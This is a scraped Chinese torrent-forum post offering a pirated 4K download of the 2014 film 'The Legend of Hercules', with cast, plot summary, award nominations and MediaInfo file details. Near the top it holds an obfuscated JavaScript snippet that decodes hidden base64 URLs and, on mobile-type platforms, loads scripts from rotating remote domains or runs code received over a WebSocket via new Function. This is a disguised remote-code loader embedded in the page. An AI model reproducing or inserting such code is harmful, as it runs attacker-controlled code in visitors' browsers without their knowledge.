大力神[英语音轨/中文字幕].The.Legend.of.Hercules.2014.2160p.4K迅雷下载 20.08GB

版主小s 29天前 199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 大力神 / 大力神:传奇开始 / 大力战神(港) / 钢铁力士(台) / 大力士 / 海格力斯:传说之始 / Hercules: The Legend Begins / Hercules 3D

◎片 名 The Legend of Hercules

◎年 代 2014

◎产 地 美国

◎类 别 动作 / 冒险

◎语 言 英语

◎上映日期 2014-04-11(中国大陆) / 2014-01-10(美国)

◎IMDb链接 https://www.imdb.com/title/tt1043726/

◎豆瓣评分 4.9/10 (16666人评价)

◎豆瓣链接 https://movie.douban.com/subject/24859795/

◎片 长 99分钟

◎导 演 雷尼·哈林 Renny Harlin (id:1032052)

◎编 剧 希恩·胡德 Sean Hood (id:1023229)

丹尼尔·吉阿 Daniel Giat (id:1015200)

雷尼·哈林 Renny Harlin (id:1032052)

朱利奥·史蒂夫 Giulio Steve (id:1339188)

◎演 员 凯南·鲁兹 Kellan Lutz (id:1031799)

盖亚·维斯 Gaia Weiss (id:1336776)

斯科特·阿金斯 Scott Adkins (id:1017912)

罗姗妮·麦琪 Roxanne McKee (id:1023325)

利亚姆·加里根 Liam Garrigan (id:1315910)

连姆·麦肯泰尔 Liam McIntyre (id:1229519)

拉德·舍博德兹加 Rade Serbedzija (id:1025225)

乔纳森·斯卡奇 Johnathon Schaech (id:1049636)

卢克·纽伯里 Luke Newberry (id:1127176)

肯内斯·库兰汉姆 Kenneth Cranham (id:1078956)

玛丽亚·盖尔 Mariah Gale (id:1338450)

萨拉·吉瓦蒂 Sarai Givaty (id:1183793)

迪米特尔·多切诺夫 Dimiter Doichinov (id:1338449)

尼古拉·索蒂罗夫 Nikolai Sotirov (id:1151274)

拉多斯拉夫·巴瓦诺夫 Radoslav Parvanov (id:1186587)

巴沙尔·拉海尔 Bashar Rahal (id:1140666)

斯宾塞·怀尔丁 Spencer Wilding (id:1194815)

Jukka Hilden Jukka Hilden (id:1202873)

特伦斯·伯杰龙 Terrence Bergeron (id:1411064)

◎标 签 神话 / 美国 / 动作 / 2014 / 奇幻 / 美国电影 / 魔幻 / 爱情

◎简 介

王后阿尔克墨涅(罗姗妮·麦琪RoxanneMcKee饰)无法忍受丈夫安菲特律翁(斯科特·阿特金斯ScottAdkins饰)对人民的残暴统治,向神祈求帮助,于是,她诞下了背负着推翻王权统治的责任的儿子赫拉克勒斯(凯南·鲁兹KellanLutz饰),可是,对于自己的使命,赫拉克勒斯一无所知。

国王宠爱长子伊菲克勒斯(利亚姆·加里根LiamGarrigan饰),却对赫拉克勒斯嗤之以鼻。之后,赫拉克勒斯爱上了美丽的赫伯公主(盖娅·威斯GaiaWeiss饰),然而,国王却将河公主许配给了伊菲克勒斯。伊菲克勒斯虽然表面上待弟弟十分宽厚,背地却是个两面三刀的小人,为了能够和所爱的人双宿双飞,赫拉克勒斯决定同赫伯公主私奔,然而却被护卫拦下,等待着他的,将会是残酷的惩罚。

◎获奖情况 (共8项)

第35届金酸莓奖 (2015)

最差影片(提名)

最差男主角(提名)

└──凯南·鲁兹 (id:1031799)

最差女主角(提名)

└──盖亚·维斯 (id:1336776)

最差导演(提名)

└──雷尼·哈林 (id:1032052)

最差银幕组合(提名)

└──凯南·鲁兹 (id:1031799)

└──凯南·鲁兹 (id:1031799)

最差前传、重拍、恶搞及续集电影(提名)

第16届美国青少年选择奖 (2014)

最佳动作冒险电影男演员(提名)

└──凯南·鲁兹 (id:1031799)

第1届豆瓣电影年度榜单 (2014)

评分最低的外语电影(提名)

  1. General

  2. Unique ID : 64474147674627257494995625962717255188 (0x308144E7F7A48A2A1169AB3E21831614)

  3. Complete name : The.Legend.of.Hercules.2014.2160p.HDR.UHD.BluRay.TrueHD.7.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 20.1 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 29.1 Mb/s

  10. Movie name : The Legend of Hercules 2014 2160p HDR UHD BluRay TrueHD 7.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-06-14 12:42:47

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 38 min

  22. Bit rate : 22.3 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.112

  32. Stream size : 15.4 GiB (77%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 38 min

  52. Bit rate mode : Variable

  53. Bit rate : 6 694 kb/s

  54. Maximum bit rate : 10.0 Mb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 4.61 GiB (23%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 15

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 27 min

  75. Bit rate : 18.8 kb/s

  76. Count of elements : 1480

  77. Stream size : 11.7 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 27 min

  89. Bit rate : 19.1 kb/s

  90. Count of elements : 1480

  91. Stream size : 11.9 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #3

  97. ID : 5

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 27 min

  103. Bit rate : 32.8 kb/s

  104. Count of elements : 1480

  105. Stream size : 20.4 MiB (0%)

  106. Title : CHS&ENG

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #4

  111. ID : 6

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 27 min

  117. Bit rate : 33.1 kb/s

  118. Count of elements : 1480

  119. Stream size : 20.6 MiB (0%)

  120. Title : CHT&ENG

  121. Language : Chinese

  122. Default : No

  123. Forced : No


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:05:36.169 : en:Chapter 02

  127. 00:05:36.253 : en:Chapter 03

  128. 00:10:34.968 : en:Chapter 04

  129. 00:10:35.051 : en:Chapter 05

  130. 00:17:11.781 : en:Chapter 06

  131. 00:17:11.864 : en:Chapter 07

  132. 00:23:15.853 : en:Chapter 08

  133. 00:23:15.936 : en:Chapter 09

  134. 00:27:16.009 : en:Chapter 10

  135. 00:27:16.093 : en:Chapter 11

  136. 00:35:02.017 : en:Chapter 12

  137. 00:35:02.100 : en:Chapter 13

  138. 00:38:07.535 : en:Chapter 14

  139. 00:38:07.619 : en:Chapter 15

  140. 00:44:51.022 : en:Chapter 16

  141. 00:44:51.105 : en:Chapter 17

  142. 00:50:43.165 : en:Chapter 18

  143. 00:50:43.249 : en:Chapter 19

  144. 00:56:35.350 : en:Chapter 20

  145. 00:56:35.434 : en:Chapter 21

  146. 01:00:16.029 : en:Chapter 22

  147. 01:00:16.112 : en:Chapter 23

  148. 01:06:19.684 : en:Chapter 24

  149. 01:06:19.767 : en:Chapter 25

  150. 01:11:13.269 : en:Chapter 26

  151. 01:11:13.352 : en:Chapter 27

  152. 01:17:30.813 : en:Chapter 28

  153. 01:17:30.896 : en:Chapter 29

  154. 01:23:31.798 : en:Chapter 30

  155. 01:23:31.882 : en:Chapter 31



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作 冒险

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回